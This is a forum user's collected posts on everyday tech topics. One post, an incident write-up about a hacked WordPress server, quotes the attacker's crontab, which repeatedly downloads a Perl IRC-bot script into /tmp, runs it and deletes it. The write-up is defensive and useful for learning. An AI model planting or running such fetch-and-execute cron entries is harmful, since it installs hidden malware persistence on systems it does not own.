Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Messages - Pinako

Pages: [1] 2 3 ... 77
General Chat / Re: Security through obscurity....
« on: January 08, 2015, 10:30:40 AM »
Sure, but all security is achieved through obscurity (... of passwords/keys/etc); some obscurity is easier to unmask than others ;)

General Chat / Re: My Ubuntu is dead after replacing graphics adapters
« on: January 08, 2015, 10:26:12 AM »
Mop, how's your experience with Linux Mint?

I've only really used LMDE, and I think it's pretty nice. LMDE used to be a rolling release distro that tracks Debian Testing, but it's going stable. I use it on servers that also need a pretty GUI for clients (though they rarely touch the GUI anyway... it just works™ most of the time).

Technical Help & Server Administration / Using RAID for backup?
« on: January 06, 2015, 01:14:05 AM »
Everyone knows that RAID is not backup, but I've sometimes wanted to do this:
  • maintain some data
  • periodically, plug in a backup disk to mirror all the things
  • somehow, copy only the updated data to save time
I know that there are many tools for this, including rsync, but I think mdadm might also do the trick: it mirrors stuff, using a write-intent bitmap to speed things up. Who does this?

Ah, that would be perfect. It sounds tricky, though.

Wait, what would you do with a half tube or quarter tube? Entertainment? I'd roll it like an egg-roll.

Hm... I suppose it's most useful for a setup with many cables and many switches. I could probably make do with some labelled cables.

Thank you for the thorough explanation. The layout and furniture plan are coming together, so I figured this would be a good time to think about the wiring schematics.

I was also thinking about putting the cables through some kind of pipe/conduit (I like the rope idea!). If the pipe needs to bend, it'd need a fairly large bend radius to accommodate the cable stiffness, right? And what's the advantage to having a patch panel as opposed to just plugging everything directly into a switch?

Technical Help & Server Administration / how does one do structured wiring?
« on: November 28, 2014, 12:54:03 PM »
I'm preparing some shiny new office space, and I figured I'd run some cat6/6a cables all over the place. I currently just snake a bunch of solid-core UTP cables above the ceiling to plug directly into a switch and other networking equipment: no patch panels, no wall plates, etc. It works well because the topology doesn't change much, the mess is easily concealed using raceways and dropped ceilings, and everything's easy to access for debugging.

The new place would have a dozen rooms and 1-3 drops/room. What's the right™ way to do this, and why?

Mobile Devices / Re: Google ara
« on: October 24, 2014, 09:41:07 PM »
Oh, I see. So the user-replaceable battery is now a unique selling proposition? I suppose it's gonna have user-swappable storage, too.

Mobile Devices / Re: Is there a war between Google and Adobe?
« on: October 02, 2014, 07:16:37 PM »
Size absolutely matters.

General Chat / Re: Mobile Keyboard recommendations?
« on: September 30, 2014, 11:54:56 PM »
Ooh, I like the device-selection dial and the groove is a nice touch -- although it is less portable than competitors.

I've got an HP K4000 keyboard
When compared to a desktop keyboard, how's the feel?

The chiclet keys travel just a hair more than 1 mm when you press down -- about the same as the AmazonBasics, the iClever, and my laptop (a Dell Inspiron 15z). In comparison, my old Toshiba laptop has scissor-switch keys that depress ~2 mm, and desktop keys could go a bit deeper (it varies). Regarding tactile experience, most of my keyboards feel sufficiently crisp (though I've seen them described as "mushy," whatever that means... this is mushy). The arrow keys could be bigger, but they're tolerable. The iClever seems to require slightly more actuation force and is noisier than the others, which slows me down somewhat. Nonetheless, the experience is far superior to that of using an on-screen virtual keyboard ;) To be fair, these are mobile keyboards so there are certain design limitations...

Honestly, go for an apple wireless keyboard. It is a bit pricey ($70 I think?).

It's probably more durable than plastic, but also weightier. I'd probably be gentler on the Apple keyboard, resulting in even greater longevity.

General Chat / Re: Uses for an old Atom netbook in 2014?
« on: September 30, 2014, 11:30:06 AM »
You could use it as a management terminal for your servers :D

Maybe a [bulky] digital picture frame?

General Chat / Re: Mobile Keyboard recommendations?
« on: September 30, 2014, 11:26:37 AM »
Yeah, that layout looks slightly difficult to use. I've got an HP K4000 keyboard (refurbished for $15 recently) that has been working great for the past couple of months. It sleeps well, wakes promptly, and types comfortably.

My AmazonBasics keyboard looks similar (i.e. sleek) and worked well for ~8 months before it started getting flaky; the version for iDevices has an extra row of keys, which I appreciated.

I've also tried the bottom-of-the-barrel keyboards i.e. Anker, iClever, etc. They're good for most purposes, and the main problem is that they might take a second to wake up after some inactivity; there might also be some occasional repeated/dropped keystrokes. It happens often enough to be a minor annoyance at times, but shouldn't be a problem for light-duty work.

I was thinking it got installed on Sept 14th ;) still no sign of recurrence.

I agree.

Then again, I wanna see what this clever bot could do ;)
The damage potential is low: the host is behind a NAT device and the only publicly-mapped port is 80. Ofc, it could call home with all kinds of data, spew some spam, DoS some targets, etc. It's fun to live dangerously.

No attack source IP's... but the attacker isn't exactly discreet about flaunting his/her domain name.

16 went down last night, so I decided to investigate. When I logged in, I found:

$ ps aux | grep apache
www-data  3454  0.0  0.8  32032  4168 ?        S    Sep23   0:00 /usr/bin/apachessl
www-data  9236  0.0  0.8  32032  4172 ?        S    Sep23   0:00 /usr/bin/apachessl
www-data  9250  0.0  0.8  32032  4172 ?        S    Sep23   0:00 /usr/bin/apachessl
www-data  9264  0.0  0.8  32032  4172 ?        S    Sep23   0:00 /usr/bin/apachessl
... ... ...

... and so on. There were dozens of processes named /usr/bin/apachessl and no memory left. All the processes were owned by www-data (the web server's account) and children of init (i.e. daemonized). When I killed these processes, they returned after a few minutes. At first glance, one might conclude that something was making the web server fork out of control.

The kicker was that 1) I use nginx, 2) I don't have apache installed, and 3) there's no /usr/bin/apachessl on the filesystem. Wait, what?

Suspecting that some rogue process was renaming itself to avoid detection, I dug around under /proc to locate the executable image. It turned out to be none other than the Perl interpreter. This was a Perl script.

Checking my crontabs, I found:

$ cat /var/spool/cron/crontabs/www-data
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Sun Sep 14 02:20:01 2014)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/3 * * * * cd /tmp;wget;curl -O;perl abc.txt;rm -f abc.txt
*/30 * * * * cd /tmp;wget;curl -O;perl xyz.txt;rm -f xyz.txt

Whoa! I don't remember installing this crontab. Here's a pastebin mirror of abc.txt. Doesn't it look like a bot that calls home to an IRC server? Yet, this is no ordinary IRC server: it runs on port 8080 and speaks HTTP at first (fooling some intrusion detection systems), but quickly switches to IRC. Unfortunately, I wasn't able to retrieve xyz.txt.

So I killed all the rogue processes, cleaned up the crontab, and rebooted; so far, the processes haven't returned. I also updated/reinstalled Wordpress for good luck :)

What do you think?

General Chat / Re: Does anyone know how....
« on: September 19, 2014, 09:11:19 PM »
Windows is setup on a separate partition.
I'm tempted to put Windows 8 on a USB disk. WinXP was the last Windows release that worked well on USB for me.

General Chat / Re: Apple Watch
« on: September 14, 2014, 11:41:24 AM »

iirc, the first generation Galaxy Gear was going for some $60 at Best Buy recently...
Keep in mind the Galaxy Gear REQUIRES a Samsung smartphone - it won't work with just any Android device, iirc. But if you're talking about just using it for the screen, you might be able to do that with some hardware magic.

Yeah, you do need a Galaxy Gear approved phone to activate the first generation Galaxy Gear before you could root and reflash it; after that, it'd work with any Android device and function pretty much independently. If you're sneaky enough, you could probably do this at the store ;)

General Chat / Re: Apple Watch
« on: September 14, 2014, 10:06:32 AM »

iirc, the first generation Galaxy Gear was going for some $60 at Best Buy recently... it might be a combination of age and competition from Apple. I'm not quite sold on the idea of gaming on a smart watch, but the whole thing might be small enough to embed into a controller, gameboy-style.

General Chat / Re: Apple Watch
« on: September 09, 2014, 04:39:54 PM »
Heh, that looks like an iPod Nano with a strap... not bad. But gold that's twice as hard as standard gold? I guess that's Apple-speak for impurities. What do you think of LG's G Watch R?

Pages: [1] 2 3 ... 77